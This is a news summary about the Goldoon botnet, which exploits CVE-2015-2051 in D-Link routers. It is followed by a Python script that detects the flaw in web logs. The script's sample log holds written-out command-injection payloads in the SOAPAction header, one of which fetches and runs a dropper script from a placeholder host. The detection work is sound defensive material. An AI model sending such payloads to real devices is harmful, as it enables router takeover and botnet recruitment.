New “Goldoon” Botnet Targets D-Link Routers With Decade-Old Flaw


May 2, 2024 at 06:27AM

A new botnet named Goldoon exploits D-Link routers through a decade-old vulnerability, CVE-2015-2051, to achieve remote code execution. It uses a dropper script to download and execute the Goldoon payload, which supports a range of attacks, including DDoS flooding. The campaign reflects the continued shift of botnet operators toward routers as footholds for a variety of illicit activity.

Summary:

– A new botnet called Goldoon is targeting D-Link routers by exploiting the decade-old critical security flaw CVE-2015-2051.
– Attackers can gain complete control of compromised devices, extract system information, and use them for further attacks, including DDoS.
– The botnet activity spiked around April 9, 2024, and targets various Linux system architectures.
– Goldoon malware establishes persistence on compromised devices and contacts a C2 server for follow-up actions, including 27 different DDoS flood attack methods.
– Cybercriminals and APT actors are interested in compromised routers for various purposes, including using them as an anonymization layer and as covert listening posts.
– U.S. government dismantled parts of a botnet called MooBot, primarily leveraging Ubiquiti EdgeRouters.
– Some threat actors infect Ubiquiti routers with malware and use them as exit nodes in a residential proxy botnet for various malicious activities, including cryptocurrency mining and spear phishing.
– Internet routers are popular assets for threat actors due to reduced security monitoring, less stringent password policies, infrequent updates, and powerful operating systems allowing installation of various types of malware.
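As an added example (not code from the article or from any vendor report), the following Python scans constructed web-server log lines for HNAP requests whose SOAPAction header carries shell metacharacters. That header is the injection point of CVE-2015-2051, a command-injection flaw in the D-Link HNAP GetDeviceSettings handler according to the public CVE record; the article itself only names the CVE. The log format, client IPs, and the dropper URL in the sample are constructed for illustration, and the three-field layout is an assumption of this example, not a real D-Link log format.

```python
import re
from dataclasses import dataclass

# Constructed log format (assumption of this example): one request per line,
# fields separated by " | ": client_ip | method path | SOAPAction header (or "-").
# The IPs are documentation ranges and the dropper URL is made up.
SAMPLE_LOG = """\
198.51.100.7 | POST /HNAP1/ | http://purenetworks.com/HNAP1/GetDeviceSettings
203.0.113.9 | POST /HNAP1/ | http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp;wget http://203.0.113.5/d.sh;sh d.sh`
192.0.2.4 | GET /index.html | -
203.0.113.9 | POST /HNAP1/ | http://purenetworks.com/HNAP1/GetDeviceSettings/$(id)
"""

# Legitimate SOAPAction values for HNAP all live under this namespace.
HNAP_PREFIX = "http://purenetworks.com/HNAP1/"

# Shell metacharacters that never appear in a genuine HNAP action URI.
SHELL_META = re.compile(r"[`;|&]|\$\(")


@dataclass
class Finding:
    client_ip: str
    path: str
    soap_action: str
    reason: str


def parse_line(line):
    """Split one constructed log line into (ip, method, path, soap_action)."""
    parts = [p.strip() for p in line.split(" | ")]
    if len(parts) != 3:
        return None
    ip, request, soap = parts
    method, _, path = request.partition(" ")
    return ip, method, path, soap


def inspect_request(ip, method, path, soap_action):
    """Return a Finding for HNAP requests with a suspicious SOAPAction, else None."""
    if not path.startswith("/HNAP1"):
        return None  # only the HNAP endpoint is relevant to this check
    if soap_action == "-":
        return None  # no SOAPAction header present
    if not soap_action.startswith(HNAP_PREFIX):
        return Finding(ip, path, soap_action, "SOAPAction outside HNAP namespace")
    if SHELL_META.search(soap_action):
        return Finding(ip, path, soap_action,
                       "shell metacharacters in SOAPAction (CVE-2015-2051 pattern)")
    return None


def scan_log(text):
    """Scan a block of log lines and collect all findings."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        finding = inspect_request(*parsed)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client_ip} {f.path} -> {f.reason}: {f.soap_action}")
```

The check keys on the header value rather than on any particular dropper URL or command, so it still fires when the payload changes; the cost is that a benign but malformed SOAPAction would also be flagged, which is acceptable for a device that should never see shell syntax in that header.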


